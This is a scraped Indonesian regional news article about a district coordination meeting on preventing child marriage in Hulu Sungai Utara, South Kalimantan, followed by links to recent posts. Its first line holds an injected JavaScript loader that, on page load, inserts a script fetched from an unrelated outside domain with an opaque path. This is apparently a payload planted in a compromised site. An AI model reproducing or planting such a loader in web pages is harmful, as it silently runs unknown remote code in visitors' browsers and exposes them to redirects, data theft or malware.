(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Cegah Perkawinan Usia Anak, DPPPA HSU Gelar Rakor hingga Kades Ikut Hadir


KANALKALIMANTAN. COM, AMUNTAI – Dinas Pemberdayaan Perempuan dan Perlindungan Anak (DPPPA) Hulu Sungai Utara (HSU) menggelar rapat koordinasi bersama SKPD, Camat, forum anak hingga Kepala Desa, Kamis (30/9/2021). Pertemuan tersebut guna sosialisasi pencegahan perkawinan usia anak di HSU.

Rakor yang digelar di Gedung Agung lantai 2 ini, dihadiri Wakil Bupati Husairi Abdi, Kabid KHPK DPPPA Provinsi Kalsel Hj Titik Haryati, Ketua MUI HSU KH Said Masrawan, dan Wakil Ketua Pengadilan Agama Amuntai H Subhan.

Husairi Abdi mengatakan, kegiatan ini dimaksudkan untuk rencana aksi pencegahan perkawinan usia anak lebih efektif lagi. Terlebih di bawah monitoring DPPPA Provinsi Kalsel.

“Ini bulan pelarangan untuk menikahkan anak, tapi ini lebih kepada pernikahan yang sesuai dengan kejiwaan anak untuk betul-betul matang sehingga siap untuk menghadapi kehidupan berumah tangga,” kata Wabup Husairi.

 

Baca juga : Aksi Kamisan dan Aliansi BEM se-Kalsel Kenang Kilas Balik Pelanggaran HAM 30 September 1965

Ia mengatakan, sepatutnya bagi anak yang hendak menuju jenjang perkawinan minimal sudah memiliki mental spiritualnya kuat, ditambah lagi kemampuan dan pendidikan yang layak.

Husaini berharap angka perkawinan usia anak di Kabupaten HSU dapat ditekan sehingga rumah tangga yang dibangun dapat damai dan bahagia.

“Apa yang kita dapat dari tahun ketahuan, jumlah perkawinan anak usia dini ini, diharapkan dapat kita tekan, masyarakat kita sadar akan usia edial perkawinan bagi anak, sehingga menghadapi rumah tangga dapat damai, sakinah mawaddah warahmah,” imbuhnya.

Sementara itu, Kabid KHPK DPPPA Provinsi Kalsel Hj Titik Haryati, menyebutkan tahun 2020 Kalsel berada di urutan ke-6 nasional terkait kondisi perkawinan usia anak. Sedangkan pada tahun 2019 menempati posisi pertama.

 

Baca juga : Sepak Terjang PKI di Kalsel, Murka Soekarno pada Hasan Basry Gara-gara Menolak Nasakom (1)

Ia berharap upaya penekanan angka perkawinan pada usia anak di Kalimantan Selatan nantinya semakin tahun dapat terus berlanjut termasuk di HSU.

“Kita harap penekanan perkawinan ini tidak hanya di tingkat kabupaten tetapi juga sampai ke tingkat desa,” ujarnya.

Guna menekan perkawinan usia anak, Titik Haryati juga berharap bisa dikurangi dengan berbagai kegiatan, pelatihan, kursus, keterampilan dan olahraga.

Senada dengan itu, Kepala DPPPA HSU. Hj Gusti Iskandariah menyebut pihaknya sejak tahun 2016 telah melaksanakan aksi-aksi pencegahan perkawinan usia anak hingga sekarang.

 

Baca juga : Humas Polri Ajak Santri Ponpes Darul Ilmi Banjarbaru Lawan Paham Radikalisme

Aksi-aksi tersebut, kata Gusti dibarengi dengan membuat perjanjian kerja sama (MoU) bersama beberapa instansi terkait di antaranya dengan Kementerian Agama, Pengadilan Agama Kelas 1B Amuntai, Disdukcapil dan seluruh KUA yang ada di HSU tentang sistem data perkawinan anak.

“Dengan peran yang lebih baik lagi, Mudah-mudahan ini menjadi cikal-bakal bahwa kita telah melakukan aksi-aksi sebagainya, sehingga tinggal apa lagi yang perlu dilakukan HSU, sehingga dorongan tim pokja pencegahan perkawinan usia anak Provinsi Kalimantan selatan dapat dilakukan kita,” katanya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

5 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

6 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

7 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

8 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

10 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

11 jam ago

This website uses cookies.